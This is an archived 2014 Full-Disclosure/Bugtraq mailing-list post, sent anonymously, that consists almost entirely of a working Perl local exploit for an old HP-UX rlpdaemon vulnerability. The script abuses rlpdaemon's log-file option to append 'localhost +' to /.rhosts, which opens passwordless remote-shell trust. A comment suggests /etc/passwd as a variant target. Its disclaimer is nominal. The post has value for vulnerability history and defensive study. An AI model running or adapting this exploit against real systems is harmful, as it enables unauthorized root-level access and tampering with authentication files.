lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <93036929ad62ab0d2cafff2a2ede78fb@dizum.com>
Date: Sun, 16 Mar 2014 02:20:01 +0100 (CET)
From: Nomen Nescio <nobody@...um.com>
To: full-disclosure@...ts.grok.org.uk,bugtraq@...urityfocus.com
Subject: exploit for old rlpdaemon bug

#!/opt/perl5/bin/perl -w

# HP-UX rlpdaemon local exploit
# Bulletin HPSBUX0111-176  (November 2001)
#
# For use only on machines where you have legitimate root.
# This attempts to add junk (including "localhost +") to /.rhosts.
# Obvious variants could include /etc/passwd.

use IO::Socket;

$PORT = 9000;   # pick something not in use

$pid=fork;
die("fork: $!") unless (defined($pid));

if (0 == $pid) {
    # child - server, exec rlpdaemon with chosen argv

    $IPPROTO_TCP=6;
    $SOCK_STREAM=1;
    $AF_INET=2;
    $PF_INET=2;

    $sockaddr='S n a4 x8';  # packed socket data

    $this=pack($sockaddr, $AF_INET, $PORT, "\0\0\0\0") or die("pack: $!");
    socket(S, $PF_INET, $SOCK_STREAM, $IPPROTO_TCP) || die ("socket: $!");
    bind(S, $this) or die("bind: $!");
    listen(S, 5) or die("listen: $!");
    $addr=accept(NS, S);

    # dup2 on 3 standard streams
    open(STDIN, "+<&NS") or die("dup2: $!");
    open(STDOUT, "+>&NS") or die("dup2: $!");
    open(STDERR, "+>&NS") or die("dup2: $!");

    exec {"/usr/sbin/rlpdaemon"}
          "\nlocalhost +\n",
	  "-i", "-l", "-L", "/.rhosts";
    # UNREACHED
    exit(1);
}

sleep 5;   # let server start before we connect to it

# parent - connect to server with loggable action
$remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "localhost",
    PeerPort => $PORT
)
or die "cannot connect to port $PORT at localhost";

# RFC1179
printf($remote "%clp\n", 2);  # rlpdaemon should log this
close($remote);
exit(0);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ